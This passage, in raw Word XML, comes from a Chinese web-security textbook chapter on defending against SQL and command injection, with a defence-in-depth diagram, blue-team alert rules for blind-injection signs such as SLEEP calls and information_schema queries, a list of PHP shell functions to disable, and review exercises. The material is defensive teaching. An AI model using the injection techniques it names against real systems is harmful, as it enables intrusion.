      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或安全的执行函数。例如，PHP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">escapeshellarg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对参数转义，Java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中避免</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime.getRuntime.exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接拼接，而应使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ProcessBuilder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传递参数列表。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">采用白名单验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。若输入为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，则严格匹配</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址正则；若为域名，则允许字母、数字、点、连字符，拒绝一切元字符。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限原则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用进程以最低权限运行，即使被注入，也难以访问敏感文件或提升权限。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁用危险函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置中禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passthru</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，仅保留必要功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="180"/>
    <w:bookmarkEnd w:id="181"/>
    <w:bookmarkStart w:id="182" w:name="注入纵深防御总览框"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入纵深防御总览框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至此，本章涵盖了两类最重要的注入漏洞——SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入与命令注入。二者均源于同一安全假设的违反：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">用户输入不应被当作代码执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。纵深防御并非堆砌工具，而是自底向上构建多层控制，使得突破一层并不等于全盘失守。以下架构统一适用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入与命令注入，并成为后续各章（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS、SSTI）防御范式的蓝本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">graph TD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A[用户输入]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B[参数化查询/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全调用]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C[最小权限账户]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">D[白名单输入校验]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D --&gt; E[WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">F[数据库/应用审计]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">G[蓝队监控与告警]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第一层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">参数化（根治）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入，预编译语句（Prepared</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement）和参数化查询彻底分离代码与数据，是消除注入的根本方法。对命令注入，同样的思想体现为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">避免将用户数据拼入命令串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，转而使用安全的系统调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">subprocess.run(['cmd', arg])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的列表形式），或干脆不调用外部命令。若必须调用，则通过白名单选择预设命令，而非由用户自由构造。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第二层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即使攻击者绕过了第一层防御，其获得的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或数据库连接也应当是最小权限的。Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用数据库账户不应具备</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DROP TABLE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或修改系统表的权限；Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程不应以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行，文件系统权限应限制在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根目录。这是纵深防御的核心韧性所在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第三层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">白名单校验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在不可信输入到达执行点之前，实施类型严格的白名单校验。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入，若参数应为整数则强制类型转换；对于命令注入，比对用户输入是否在预定义的允许列表内（如“允许</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的域名列表”）。注意，黑名单过滤容易被编码、大小写变体绕过，仅作为检测辅助，不可作为安全边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第四层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF（纵深非根治）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙（WAF）位于网络边界，提供规则匹配和异常检测，能阻挡大量已知攻击特征。但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不能理解应用逻辑，无法防御未知或编码混淆的注入。攻击者可利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绕过技术（如分块传输、字符集混淆）穿透防线。因此</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是有效但不彻底的补偿控制，无法替代代码层面的修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第五层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据库审计与蓝队告警</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在数据库层面，审计插件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL Enterprise Audit、PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pgAudit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）可以记录所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DML/DDL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作，并通过异常检测发现频繁的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用。蓝队应建立以下告警规则：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同一参数在短时间内出现大量变体的请求（布尔盲注）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询耗时异常增高（时间盲注）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求中出现数据库报错信息（联合注入错误泄露）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">非业务时段出现大量系统命令执行或文件读取痕迹。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">平台（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk、Elastic）将多层日志关联分析，实现从检测到响应的闭环。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御的本质</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：不寄望于任何单一机制，而是使攻击者每深入一步都必须面对新的、异构的障碍。唯有这样，当某个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0day </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或配置失误出现时，系统才不会瞬间沦陷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="182"/>
    <w:bookmarkStart w:id="187" w:name="习题-11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="183" w:name="基础提取题"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础提取题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数化查询为什么能根治</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入？它和转义函数有何本质区别？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">布尔盲注与时间盲注的信道分别是什么？在防御方案中如何消除这些信道？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入中，为什么说黑名单过滤不能作为可靠防御？请结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不同等级给出证据。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="183"/>
    <w:bookmarkStart w:id="184" w:name="提示"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">思考数据库在执行预编译语句时，传入参数是作为“值”还是“SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">片段”被处理的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">布尔信道的本质是页面内容差异；时间信道的本质是响应时间差异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
